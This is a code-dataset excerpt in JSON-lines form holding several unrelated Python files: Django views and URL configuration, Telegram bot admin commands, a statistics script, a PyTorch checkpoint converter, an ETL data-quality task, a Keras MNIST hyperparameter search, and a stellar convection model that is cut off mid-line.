\"Internal error\", \"Diagnosis information for %s cannot be updated\"\r\n % diagnosis_id)\r\n return \"\", 204\r\n","sub_path":"medical_forum/diagnosis_resources.py","file_name":"diagnosis_resources.py","file_ext":"py","file_size_in_byte":12582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"599298764","text":"from django.contrib.auth import logout, authenticate, login\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom .models import BookList\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages\n\ndef start_page(request):\n return render(\n request,\n 'books/start_page.html',\n {}\n\n )\n\ndef all_books(request):\n lists = BookList.objects.all()\n return render(\n request,\n 'books/all_books.html',\n {'all_books': lists}\n )\n\n\n\ndef register(request):\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f\"New account created {username}\")\n login(request, user)\n return redirect(start_page)\n else:\n for msg in form.error_messages:\n print(form.error_messages[msg])\n\n return render(request=request,\n template_name=\"main/register.html\",\n context={\"form\": form})\n\n form = UserCreationForm\n return render(request = request,\n template_name = \"books/register.html\",\n context={\"form\": form})\n","sub_path":"mysite/books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"337240170","text":"from kawaiibot.bot import kawaiibot\nimport logging\n\nadmin_usernames = ['stevenyo', 'NULLSPHERE']\n\n@kawaiibot.command('disabled')\ndef disabled(args):\n disabled = [func.__name__ for func in kawaiibot.disabled]\n return ', '.join(disabled) if disabled else 'Nothing is disabled'\n\n@kawaiibot.command('disable')\ndef disable(args):\n n = []\n if args.message.from_user.username not in admin_usernames:\n return 'You can\\'t do that'\n\n for s in args.message.text.split(' ')[1::]:\n command = kawaiibot.get_command(s)\n if command not in kawaiibot.disabled:\n n.append(s)\n kawaiibot.disabled.append(command)\n logging.info('Command \\'{}\\' disabled by {}'.format(s, args.message.from_user.username))\n if len(n) > 0:\n return 'Disabled: {}'.format(', '.join(n))\n else:\n return 'Did nothing. Command already disabled.'\n\n@kawaiibot.command('enable')\ndef enable(args):\n n = []\n if args.message.from_user.username not in admin_usernames:\n return 'You can\\'t do that'\n\n for s in args.message.text.split(' ')[1::]:\n command = kawaiibot.get_command(s)\n if command in kawaiibot.disabled:\n n.append(command.__name__)\n kawaiibot.disabled.remove(command)\n logging.info('Command \\'{}\\' enabled by {}'.format(s, args.message.from_user.username))\n if len(n) > 0:\n return 'Enabled: {}'.format(', '.join(n))\n else:\n return 'Did nothing. Command already enabled.'\n\n\n","sub_path":"kawaiibot/commands/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"314132158","text":"import math\nimport scipy.special as sp\n\nN = 100\n\ndef b(n, p, k):\n return sp.comb(n, k) * math.pow(p, k) * math.pow((1-p), n-k)\n\ndef get_zscore(x, p):\n mean = N*p\n sigma = math.sqrt(N*p*(1-p))\n return (x-mean)/sigma\n \ndef p_greater(xlower):\n alpha = 0.0\n for i in range(xlower, N):\n alpha += b(N, p, i)\n return alpha\n\nif __name__ == \"__main__\":\n i = 0\n alpha, beta = 0, 0\n for i in range(N):\n alpha = 0.0\n for j in range(i, N):\n alpha += b(N, 0.5, j)\n if alpha < 0.05:\n print(f\"m: {i} for alpha\")\n break\n i = N\n for i in range(N, 0, -1):\n alpha = 0.0\n for j in range(i, N):\n alpha += b(N, 0.7, j)\n if 1-alpha < 0.05:\n print(f\"beta: {1-alpha}, i: {i}\")\n break\n \n\n \n \n \n \n \n \n \n \n \n\n ","sub_path":"Randomness/Programming Assignments/venken.py","file_name":"venken.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"52870964","text":"\"\"\"This urlconf sets the directions for the timed_mating app.\n\nIt comprises of create, update, delete, detail and list of plug events.\"\"\"\n\nfrom django.conf.urls.defaults import *\nfrom django.views.generic.list_detail import object_list, object_detail\nfrom django.views.generic.create_update import create_object, update_object, delete_object\nfrom django.contrib.auth.decorators import login_required, permission_required\n\nfrom mousedb.timed_mating.models import PlugEvents\n\n@login_required\ndef limited_object_list(*args, **kwargs):\n\treturn object_list(*args, **kwargs)\n\n@login_required\ndef limited_object_detail(*args, **kwargs):\n\treturn object_detail(*args, **kwargs)\n\n@permission_required('timed_mating.add_plugevents')\ndef create_plugevents(*args, **kwargs):\n\treturn create_object(*args, **kwargs)\n\n@permission_required('timed_mating.change_plugevents')\ndef change_plugevents(*args, **kwargs):\n\treturn update_object(*args, **kwargs)\n\n@permission_required('timed_mating.delete_plugevents')\ndef delete_plugevents(*args, **kwargs):\n\treturn delete_object(*args, **kwargs)\n\nurlpatterns = patterns('',\n\turl(r'^$', limited_object_list, {\n\t\t'queryset': PlugEvents.objects.all(),\n\t\t'template_name': 'plug_list.html',\n\t\t'template_object_name': 'plug',\n\t\t}, name=\"plugevents-list\"),\n\turl(r'^(?P\\d*)/$', limited_object_detail, {\n\t\t'queryset': PlugEvents.objects.all(),\n\t\t'template_name': 'plug_detail.html',\n\t\t'template_object_name': 'plug',\n\t\t}, name=\"plugevents-detail\"),\n\turl(r'^new/$', create_plugevents, {\n\t\t'model': PlugEvents, \n\t\t'template_name': 'plug_form.html', \n\t\t'login_required':True,\n\t\t'post_save_redirect':'/mousedb/plug_events/'\n\t\t}, name=\"plugevents-new\"),\n\turl(r'^(?P\\d*)/edit/$', change_plugevents, {\n\t\t'model': PlugEvents, \n\t\t'template_name': 'plug_form.html', \n\t\t'login_required':True,\n\t\t'post_save_redirect':'/mousedb/plug_events/'\n\t\t}, name=\"plugevents-edit\"),\n\turl(r'^(?P\\d*)/delete/$', delete_plugevents, {\n\t\t'model': PlugEvents, \n\t\t'login_required':True,\n\t\t'post_delete_redirect':'/mousedb/plug_events/',\n\t\t'template_name':'confirm_delete.html'\n\t\t}, name=\"plugevents-delete\"),\n\turl(r'^breeding/(?P\\d*)/new', 'mousedb.timed_mating.views.breeding_plugevent', name=\"breeding-plugevents-new\"),\n)\n","sub_path":"src/mousedb/timed_mating/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"392632393","text":"import torch\nimport os\n\nimport os\nimport torch\nimport argparse\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\n\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\n\nimport networks\nfrom utils.transforms import transform_logits\nfrom datasets.simple_extractor_dataset import SimpleFolderDataset\nimport torch.nn.functional as F\n\neps = 1e-5\ncheckpoints_path = '/home/qiu/Downloads/models/SCHP/'\nckpt_choice = {\n 'lip': 'exp-schp-201908261155-lip.pth',\n 'atr': 'exp-schp-201908301523-atr.pth',\n 'pascal': 'exp-schp-201908270938-pascal-person-part.pth'\n}\nchoices = ['lip', 'atr', 'pascal']\nity = choices[2]\ninputs = {\n 'lidingtiao': '/home/qiu/Projects/lidingtiao/full_cut/imgs/',\n 'run': './run/',\n 'err': './error/'\n}\ninputs_ch = ['lidingtiao', 'run', 'err']\ninputd = inputs_ch[2]\ndataset_settings = {\n 'lip': {\n 'input_size': [473, 473],\n 'num_classes': 20,\n 'label': ['Background', 'Hat', 'Hair', 'Glove', 'Sunglasses', 'Upper-clothes', 'Dress', 'Coat',\n 'Socks', 'Pants', 'Jumpsuits', 'Scarf', 'Skirt', 'Face', 'Left-arm', 'Right-arm',\n 'Left-leg', 'Right-leg', 'Left-shoe', 'Right-shoe']\n },\n 'atr': {\n 'input_size': [512, 512],\n 'num_classes': 18,\n 'label': ['Background', 'Hat', 'Hair', 'Sunglasses', 'Upper-clothes', 'Skirt', 'Pants', 'Dress', 'Belt',\n 'Left-shoe', 'Right-shoe', 'Face', 'Left-leg', 'Right-leg', 'Left-arm', 'Right-arm', 'Bag', 'Scarf']\n },\n 'pascal': {\n 'input_size': [512, 512],\n 'num_classes': 7,\n 'label': ['Background', 'Head', 'Torso', 'Upper Arms', 'Lower Arms', 'Upper Legs', 'Lower Legs'],\n }\n}\n\n\ndef get_arguments():\n \"\"\"Parse all the arguments provided from the CLI.\n Returns:\n A list of parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Self Correction for Human Parsing\")\n\n parser.add_argument(\"--dataset\", type=str, default=ity, choices=['lip', 'atr', 'pascal'])\n parser.add_argument(\"--model-restore\", type=str,\n default=os.path.join(checkpoints_path, ckpt_choice[ity]),\n help=\"restore pretrained model parameters.\")\n parser.add_argument(\"--gpu\", type=str, default='0', help=\"choose gpu device.\")\n parser.add_argument(\"--input-dir\", type=str, default=inputs[inputd],\n help=\"path of input image folder.\")\n parser.add_argument(\"--output-dir\", type=str, default='./output_' + inputd + '_' + ity,\n help=\"path of output image folder.\")\n parser.add_argument(\"--logits\", action='store_true', default=False, help=\"whether to save the logits.\")\n\n return parser.parse_args()\n\n\ndef main():\n args = get_arguments()\n\n gpus = [int(i) for i in args.gpu.split(',')]\n assert len(gpus) == 1\n if not args.gpu == 'None':\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n\n num_classes = dataset_settings[args.dataset]['num_classes']\n input_size = dataset_settings[args.dataset]['input_size']\n label = dataset_settings[args.dataset]['label']\n print(\"Evaluating total class number {} with {}\".format(num_classes, label))\n\n model = networks.init_model('resnet101', num_classes=num_classes, pretrained=None)\n\n state_dict = torch.load(os.path.join(checkpoints_path, ckpt_choice[ity]))['state_dict']\n from collections import OrderedDict\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n k = k[7:]\n ss = k.split('.')\n if ss[-2].startswith('bn') and ss[-1].endswith('weight'):\n v1 = torch.abs(v) + eps\n else:\n v1 = v\n new_state_dict[k] = v1\n model.load_state_dict(new_state_dict)\n model.cuda()\n model.eval()\n torch.save(model.state_dict(), '/home/qiu/Projects/Self-Correction-Human-Parsing/deploy/'+ity+'_abn_checkpoint.pth')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"IABN2ABN.py","file_name":"IABN2ABN.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"79643835","text":"# flake8: noqa: E501\nfrom datetime import date, datetime\n\nfrom sqlalchemy.schema import Column\nfrom sqlalchemy.types import Date, DateTime, Integer, String\n\nfrom sqltask.classes import dq\nfrom sqltask.classes.exceptions import TooFewRowsException\nfrom sqltask.classes.sql import LookupSource, SqlDataSource\nfrom sqltask.classes.table import DqTableContext\n\nfrom .base_task import BaseExampleTask\n\n\nclass FactCustomerTask(BaseExampleTask):\n def __init__(self, report_date: date):\n super().__init__(report_date=report_date)\n\n # Define the metadata for the main fact table\n self.add_table(DqTableContext(\n name=\"fact_customer\",\n engine_context=self.ENGINE_TARGET,\n columns=[\n Column(\"report_date\", Date, comment=\"Date of snapshot\", primary_key=True),\n Column(\"etl_timestamp\", DateTime, comment=\"Timestamp when row was created\", nullable=False),\n Column(\"customer_name\", String(10), comment=\"Unique customer identifier (name)\", primary_key=True),\n Column(\"birthdate\", Date, comment=\"Birthdate of customer if defined and in the past\", nullable=True),\n Column(\"age\", Integer, comment=\"Age of customer in years if birthdate defined\", nullable=True),\n Column(\"sector_code\", String(10), comment=\"Sector code of customer\", nullable=True),\n ],\n comment=\"The customer table\",\n timestamp_column_name=\"etl_timestamp\",\n batch_params={\"report_date\": report_date},\n dq_info_column_names=[\"etl_timestamp\"],\n ))\n\n # Define the main query used to populate the target table\n self.add_data_source(SqlDataSource(\n name=\"main\",\n sql=\"\"\"\nSELECT name,\n birthday\nFROM customers\nWHERE report_date = :report_date\n \"\"\",\n params={\"report_date\": report_date},\n engine_context=self.ENGINE_SOURCE,\n ))\n\n # Define a lookup source used for enriching the main source query\n self.add_lookup_source(LookupSource(\n name=\"sector_code\",\n sql=\"\"\"\nSELECT name,\n sector_code\nFROM sector_codes\nWHERE start_date <= :report_date\n AND end_date > :report_date\n \"\"\",\n params={\"report_date\": report_date},\n engine_context=self.ENGINE_SOURCE,\n ))\n\n def transform(self) -> None:\n report_date = self.batch_params[\"report_date\"]\n sector_code_lookup = self.get_lookup(\"sector_code\")\n for in_row in self.get_data_source(\"main\"):\n row = self.get_new_row(\"fact_customer\")\n\n # customer_name\n customer_name = in_row[\"name\"]\n row[\"customer_name\"] = customer_name\n\n # birthdate\n birthday = in_row[\"birthday\"]\n age = None\n try:\n birthdate = datetime.strptime(birthday, \"%Y-%m-%d\").date() if birthday else None\n age = None\n if birthdate is None:\n row.log_dq(\n column_name=\"birthdate\",\n source=dq.Source.SOURCE,\n priority=dq.Priority.MEDIUM,\n category=dq.Category.MISSING,\n message=\"Missing birthdate\",\n )\n elif birthdate > report_date:\n row.log_dq(\n column_name=\"birthdate\",\n source=dq.Source.SOURCE,\n priority=dq.Priority.HIGH,\n category=dq.Category.INCORRECT,\n message=f\"Birthdate in future: {birthday}\",\n )\n birthdate = None\n else:\n age = int((report_date - birthdate).days / 365.25)\n except ValueError:\n # parse error\n row.log_dq(\n column_name=\"birthdate\",\n source=dq.Source.SOURCE,\n priority=dq.Priority.HIGH,\n category=dq.Category.INCORRECT,\n message=f\"Cannot parse birthdate: {birthday}\"\n )\n birthdate = None\n row[\"birthdate\"] = birthdate\n\n # age\n if age is None:\n row.log_dq(\n column_name=\"age\",\n source=dq.Source.TRANSFORM,\n priority=dq.Priority.MEDIUM,\n category=dq.Category.MISSING,\n message=\"Age is undefined due to undefined birthdate\",\n )\n row[\"age\"] = age\n\n # sector_code\n sector_code = sector_code_lookup.get(customer_name)\n if sector_code is None:\n row.log_dq(\n column_name=\"sector_code\",\n source=dq.Source.SOURCE,\n priority=dq.Priority.LOW,\n category=dq.Category.MISSING,\n message=\"Sector code undefined in lookup table\"\n )\n row[\"sector_code\"] = sector_code\n\n # Finally add row to table output\n row.append()\n\n def validate(self):\n if len(self.get_table_context(\"fact_customer\").output_rows) < 2:\n raise TooFewRowsException(\"There should never be less than 2 rows\")\n","sub_path":"example/tasks/fact_customer_task.py","file_name":"fact_customer_task.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508103236","text":"# 107번을 카피해서 Activation을 넣고 튠하시오\n# LSTM -> Dense로 바꿀 것\n\nimport numpy as np\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Input, LSTM\nfrom keras.layers import Conv2D, Flatten\nfrom keras.layers import MaxPooling2D, Dropout\nfrom keras.optimizers import Adam, Adadelta, Adagrad\nfrom keras.optimizers import RMSprop, Nadam, SGD, Adamax\nfrom keras.wrappers.scikit_learn import KerasClassifier # 케라스를 사이킷런으로 감싼다. (사이킷런에서 쓸 수 있게)\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom keras.activations import relu, elu, softmax\n\n# 1. 데이터\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nprint(x_train.shape) # (60000, 28, 28)\nprint(x_test.shape) # (10000, 28, 28)\nprint(y_train.shape) # (60000,)\nprint(y_test.shape) # (10000,)\n\nx_train = x_train.reshape(x_train.shape[0], 28*28) / 255 # 정규화(min_max)\nx_test = x_test.reshape(x_test.shape[0], 28*28) / 255 # 정규화(min_max)\nx_train = x_train.reshape(x_train.shape[0], 28*28) / 255 # 정규화(min_max)\nx_test = x_test.reshape(x_test.shape[0], 28*28) / 255 # 정규화(min_max)\nprint(x_train.shape) # (60000, 784)\nprint(x_test.shape) # (10000, 784)\n\ny_train = np_utils.to_categorical(y_train) # label이 0부터 시작함\ny_test = np_utils.to_categorical(y_test) # label이 0부터 시작함\nprint(y_train.shape) # (60000, 10)\nprint(y_test.shape) # (10000, 10)\n\n\n# 2. 모델링\ndef build_model(drop, optimizer, learning_rate, activation): \n inputs = Input(shape = (784,), name = 'input')\n x = Dense(512, activation = activation, name = 'hidden1')(inputs)\n x = Dropout(drop)(x)\n x = Dense(256, activation = activation, name = 'hidden2')(x)\n x = Dropout(drop)(x)\n x = Dense(128, activation = activation, name = 'hidden3')(x)\n x = Dropout(drop)(x)\n outputs = Dense(10, activation = 'softmax', name = 'output')(x)\n\n opt = optimizer(lr = learning_rate) # optimizer와 learning_rate 엮어주기\n model = Model(inputs = inputs, outputs = outputs)\n\n model.compile(optimizer = opt, metrics = ['accuracy'],\n loss = 'categorical_crossentropy')\n return model\n\ndef create_hyperparameter():\n batches = [256, 128]\n optimizers = [Adam, Adadelta, Adamax, Nadam, RMSprop, Adagrad, SGD]\n activations = [relu, elu, softmax]\n dropout = np.linspace(0.1, 0.5, 5).tolist() # 0.1 ~ 0.5까지 5단위로\n learning_rate = [0.1, 0.05, 0.25, 0.001]\n return {'batch_size': batches,\n 'optimizer': optimizers,\n 'drop': dropout,\n 'activation': activations,\n 'learning_rate': learning_rate}\n\n# KerasClassifier 모델 구성하기\nmodel = KerasClassifier(build_fn = build_model, verbose = 1)\n\n# hyperparameters 변수 정의\nhyperparameters = create_hyperparameter()\n\nsearch = RandomizedSearchCV(estimator = model,\n param_distributions = hyperparameters, cv = 3)\n\n# 모델 훈련\nsearch.fit(x_train, y_train)\nscore = search.score(x_test, y_test)\nprint(search.best_params_) # {'optimizer': 'adadelta', 'drop': 0.2, 'batch_size': 20}\nprint(\"score : \", score) # 0.9661999940872192","sub_path":"keras/keras111_RS.py","file_name":"keras111_RS.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"356488506","text":"import sys as sys\nsys.path.append('/Users/bruker/Documents/UiO/Bachelor/Semester 6/AST3310/Project0')\nsys.path.append('/Users/bruker/Documents/UiO/Bachelor/Semester 6/AST3310/Project1')\n\n\"\"\"\nThe sys paths should be replaced with the directionary containing the file SanProject0.py, \nSanProject1.py, and Opacity.txt\n\n\"\"\"\n\nfrom SanProject1 import CoreModel\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass StarModel(CoreModel):\n\n\t\"\"\"\n\tClass that builds on the stellar core model class by including convection as a means of\n\tenergy transportation. This is done by including the definition such as temperature gradients\n\tand implementing a if statement to check for when the star is stable and unstable.\n\n\t\"\"\"\n\n\n\tdef __init__(self):\n\n\t\t#inheriting init from CoreModel\n\t\tCoreModel.__init__(self)\n\n\t\t#initial condition at the surface of the star\n\t\tself.L_s = self.L_sol\t\t\t\t\t\t\t\t\t\t#luminosity,\t\tJ/s or W\n\t\tself.R_s = self.R_sol\t\t\t\t\t\t\t\t\t\t#radius,\t\t\tm\n\t\tself.M_s = self.M_sol\t\t\t\t\t\t\t\t\t\t#mass,\t\t\t\tkg\n\t\tself.rho_s = 1.42e-7*self.avgrho_sol\t\t\t\t\t\t#density,\t\t\tkg/m^3\n\t\tself.T_s = 5770\t\t\t\t\t\t\t\t\t\t\t\t#temperature,\t\tK\n\n\t\t#Constants for ideal gas approximation\n\t\tself.del_ad = 2/5\t\t\t\t\t\t\t\t\t\t\t#adiabatic temperature gradient\n\t\tself.c_P = (5*self.k_B) / (2*self.mu_u*self.mu)\t\t\t\t#specific heat capacity\n\t\tself.alpha = 1\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\tself.delta = 1\n\n\n\n\n\t\"\"\"\n\tDefining some functions which will be used under calculations\n\n\t\"\"\"\n\n\tdef g(self, m, r):\n\n\t\t\"\"\"\n\t\tComputing the gravitational acceleration g.\n\n\t\t\"\"\"\n\n\t\treturn (self.G*m) / (r**2)\n\n\n\n\tdef H_p(self, T, m, r):\n\n\t\t\"\"\"\n\t\tComputing the height pressure scale.\n\n\t\t\"\"\"\n\n\t\treturn (self.k_B*T)/(self.g(m,r)*self.mu*self.mu_u)\n\n\n\n\tdef xi_Solver(self, T, rho, kappa, m, r, L):\n\n\t\t\"\"\"\n\t\tComputing xi = (del_star - del_parcel)^(1/2), in addition to defining some usefull quantities. \n\t\tThis is done by solving a cubic equation.\n\n\t\t\"\"\"\n\n\t\t#substitution used to shorten equations\n\t\tself.U = ((64*self.sigma*(T**3))/(3*rho**2 * self.c_P * kappa)) * np.sqrt(self.H_p(T,m,r) / self.g(m,r)*self.delta)\n\n\t\t#mixing length\n\t\tself.l_m = self.alpha*self.H_p(T,m,r)\n\n\t\t#substitution U/l_m\n\t\tself.A = (self.U/(self.l_m**2))\n\n\t\t#Geometrical constant, S/Qd = 2/r_p. This doesnt appear elsewhere in the code, but it used when computing the coeffs\n\t\tself.SQd = 4/self.l_m\n\n\t\t#coefficients for the third degree polynomial\n\t\tCoeffs = [1/self.A, 1, 4*self.A, -(self.del_Stable(m,kappa,L,rho,T,r) - self.del_ad)]\n\n\t\t#finding the the roots of the cubic equation\n\t\txi = np.roots(Coeffs)\n\n\t\tfor root in xi:\n\t\t\tif np.isreal(root):\n\n\t\t\t\t#return a real solution\n\t\t\t\treturn root.real\n\n\n\n\tdef del_Stable(self, m, kappa, L, rho, T, r):\n\n\t\t\"\"\"\n\t\tComputing the temprature gradient for when the star is in a stable state.\n\t\n\t\t\"\"\"\n\n\t\treturn (3/64) * ((kappa * self.H_p(T, m, r))/(np.pi * self.sigma)) * ((L*rho)/(T**4 *r**2))\n\n\n\n\tdef del_Star(self, T, rho, kappa, m, r, L):\n\n\t\t\"\"\"\t\n\t\tComputing the temperature gradient for the star.\n\n\t\t\"\"\"\n\n\t\t#calculating xi\n\t\txi = self.xi_Solver(T, rho, kappa, m, r, L)\n\n\t\treturn xi**2 + 4*self.A*xi + self.del_ad\n\n\n\n\tdef del_AD(self, P, T, rho):\n\n\t\t\"\"\"\n\t\tComputing the temperature gradient for an adiabatic star. Unnecessary as\n\t\tit is analytically found to be equal to 2/5 because of ideal gas, but might\n\t\tbe a good check to see if the star behaves like the ideal case (which it does).\n\n\t\t\"\"\"\n\n\t\treturn P*self.delta/(T*rho*self.c_P)\n\n\n\n\tdef dTdm_Conv(self, T, P, r, m, rho, kappa, L):\n\n\t\t\"\"\"\n\t\tComputing the new dTdm for when convection is to be considered.\n\n\t\t\"\"\"\n\t\t\n\t\treturn (T/P)*self.dPdm(r, m)*self.del_Star(T, rho, kappa, m, r, L)\n\n\n\n\tdef Vel_parcel(self, m, r, T ,rho, kappa, L):\n\n\t\t\"\"\"\n\t\tComputing the velocity of a parcel of gas moving up the star.\n\n\t\t\"\"\"\n\n\t\t#calculating xi\n\t\txi = self.xi_Solver(T, rho, kappa, m, r, L)\n\n\t\treturn np.sqrt((self.g(m,r)*self.delta*self.l_m**2)/(4*self.H_p(T,m,r)))*xi\n\n\n\n\tdef Flux_Rad(self, L, r):\n\n\t\t\"\"\"\n\t\tComputing the radiative flux for a non convective star.\n\n\t\t\"\"\"\n\n\t\treturn L / (4 * np.pi * r**2) \t\n\n\n\n\tdef Flux_Rad_Conv(self, T, kappa, rho, m, r, L):\n\n\t\t\"\"\"\n\t\tComputing the radiatve flux for a convective star.\n\n\t\t\"\"\"\n\t\t\n\t\treturn (16/3)*((self.sigma*(T**4))/(kappa*rho*self.H_p(T,m,r)))*self.del_Star(T,rho,kappa,m,r,L)\n\n\n\n\tdef Flux_Conv(self, rho, T, m, r, kappa, L):\n\n\t\t\"\"\"\n\t\tComputing the convective flux for a convective star.\n\n\t\t\"\"\"\n\n\t\t#calculating xi\n\t\txi = self.xi_Solver(T, rho, kappa, m, r, L)\n\n\t\treturn (rho*self.c_P*T*np.sqrt(self.g(m,r)*self.delta)*(self.l_m**2)*xi**3)/(4*self.H_p(T,m,r)**(3/2))\n\n\n\n\tdef dm_Var_conv(self, r, P, L, T, rho, kappa, m, dTdm, p):\n\n\t\t\"\"\"\n\t\tSubroutine that returns a variable steplength dm. This is implemented so that we can find \n\t\thow big the steplength can be without ruining our calculations.\n\n\t\t\"\"\"\n\n\t\tdm_r = p*r/self.drdm(rho,r)\t\t\t\t\t\t\t\t#dm for the variable radius\n\t\tdm_P = p*P/self.dPdm(r,m)\t\t\t\t\t\t\t\t#dm for the variable pressure\n\t\tdm_L = p*L/self.dLdm(rho,T)\t\t\t\t\t\t\t\t#dm for the variable luminosity\n\t\tdm_T = p*T/dTdm\t\t\t\t\t\t\t\t\t\t\t#dm for the variable temperature\n\n\t\tdm_list = [abs(dm_r), abs(dm_P), abs(dm_L), abs(dm_T)]\t#list of all dm_var values\n\t\tdm_Var = -np.min(dm_list)\n\n\t\t#returning the smallest value in the dm_list which is the dm to be used.\n\t\treturn dm_Var\t\t\t\t\n\n\n\n\tdef Var_Integration_Conv(self, n, r0, rho0, L0, T0, m0, kappa0, p):\n\n\t\t\"\"\"\n\t\tSubroutine that integrates the variables of interest in a convective star through\n\t\tEulers Method in addition to using variable steplength. \n\n\t\t\"\"\"\n\n\t\t#setting the last itteration\n\t\ti_end = n\n\n\t\t#creating empty arrays for each parameter\n\t\tr = np.zeros(n)\t\t\t\t\t\t\t\t\t\t\t\t\n\t\trho = np.zeros(n)\t\n\t\tP = np.zeros(n)\n\t\tL = np.zeros(n)\n\t\tT = np.zeros(n)\n\t\tm = np.zeros(n)\t\n\t\tKappas = np.zeros(n)\n\t\tepsilon = np.zeros(n)\t\t\n\t\tdel_Star = np.zeros(n)\t\n\t\tdel_ad = np.zeros(n)\n\t\tdel_Stable = np.zeros(n)\n\t\tFlux_Rad = np.zeros(n)\t\t\t\t\t\t\t \t\t\n\t\tFlux_Conv = np.zeros(n)\n\t\tPP1 = np.zeros(n)\t\t\t\t\t\t\t \t\t\n\t\tPP2 = np.zeros(n)\t\t\t\t\t\t\t \t\t\n\t \t\n\t \t#setting the initial conditions\n\t\tr[0] = r0\t\t\t\t\t\t\t\t\t\t\n\t\trho[0] = rho0\n\t\tL[0] = L0\n\t\tT[0] = T0\n\t\tm[0] = m0\n\t\tP[0] = self.Pressure(rho[0], T[0])\n\t\tKappas[0] = kappa0\n\n\t\t#initial value for the gradients\t\n\t\tdel_ad[0] = self.del_AD(P[0], T[0], rho[0])\n\t\tdel_Stable[0] = self.del_Stable(m[0], Kappas[0], L[0], rho[0], T[0], r[0])\n\n\t\t#Using the Forward Euler integration method, as it is sufficient for our analysis.\n\t\tfor i in range(0, n-1):\n\n\t\t\t#the case where we dont have convection\n\t\t\tif del_Stable[i] < self.del_ad:\n\n\t\t\t\t#if no convection, then temperature gradient of the star is = del_stable\n\t\t\t\tdel_Star[i] = del_Stable[i]\n\n\t\t\t\t#calculating the flux in the star\n\t\t\t\tFlux_Rad[i] = self.Flux_Rad(L[i],r[i])\t\t\t\t\t\t\t\t\t\t\t#radiative flux\n\n\t\t\t\tFlux_Conv[i] = 0\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#convective flux\n\n\t\t\t\t#setting dTdm for the case of no convection\n\t\t\t\tdTdm = self.dTdm(Kappas[i], L[i], r[i], T[i])\n\n\n\t\t\t#the case where we have convection\n\t\t\telse:\n\n\t\t\t\t#calculating temperature gradient when there is convection\n\t\t\t\tdel_Star[i] = self.del_Star(T[i], rho[i], Kappas[i], m[i], r[i], L[i])\t\t\t\t\n\n\t\t\t\t#calculating the flux in the star\n\t\t\t\tFlux_Rad[i] = self.Flux_Rad_Conv(T[i], Kappas[i], rho[i], m[i], r[i], L[i])\t\t#radiative flux\n\n\t\t\t\tFlux_Conv[i] = self.Flux_Conv(rho[i], T[i], m[i], r[i], Kappas[i], L[i])\t\t#convective flux\t\t\n\n\t\t\t\t#setting dTdm for the case when there is convection\n\t\t\t\tdTdm = self.dTdm_Conv(T[i], P[i], r[i], m[i], rho[i], Kappas[i], L[i])\n\n\n\t\t\t#calculating a new steplength dm for each iteration\n\t\t\tdm = self.dm_Var_conv(r[i],P[i],L[i],T[i],rho[i],Kappas[i],m[i], dTdm, p)\t\n\n\t\t\t#updating all parameters\n\t\t\tr[i+1] = r[i] + self.drdm(rho[i], r[i]) * dm\n\n\t\t\tP[i+1] = P[i] + self.dPdm(r[i], m[i]) * dm\n\n\t\t\tT[i+1] = T[i] + dTdm * dm\n\n\t\t\tL[i+1] = L[i] + self.dLdm(rho[i], T[i]) * dm\n\n\t\t\trho[i+1] = self.Density(P[i+1], T[i+1])\n\n\t\t\tKappas[i+1] = self.Kappa(rho[i+1], T[i+1])\n\n\t\t\tepsilon[i] = self.eps(rho[i],T[i])\n\n\t\t\tPP1[i] = self.PPIandPPII(rho[i],T[i])[0]\n\n\t\t\tPP2[i] = self.PPIandPPII(rho[i],T[i])[1]\n\n\t\t\tm[i+1] = m[i] + dm\n\n\t\t\tdel_Stable[i+1] = self.del_Stable(m[i+1], Kappas[i+1], L[i+1], rho[i+1], T[i+1], r[i+1])\n\n\t\t\tdel_ad[i+1] = self.del_AD(P[i+1], T[i+1], rho[i+1])\n\n\n\n\t\t\t#finding the index where we hit the center which will be the end iteration (only used for constant dm)\n\t\t\tif m[i] <= 0:\n\t\t\t\ti_end = i\n\t\t\t\tbreak\n\n\n\t\t#returning the desired paramteres which are to be studied\n\t\treturn r, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad, del_Star, Flux_Rad, Flux_Conv\n\n\n\n\tdef CrossSection(self, n, r0, rho0, L0, T0, m0, Kappa0, Title, Figname, p):\n\n\t\t\"\"\"\n\t\tSubroutine that plotts a cross section of our star.\n\n\t\t\"\"\"\t\t\n\n\t\tr, P, T, L, rho, epsilon, PP1, PP2, m , i_end, del_Stable, del_ad ,del_Star, Flux_Rad, 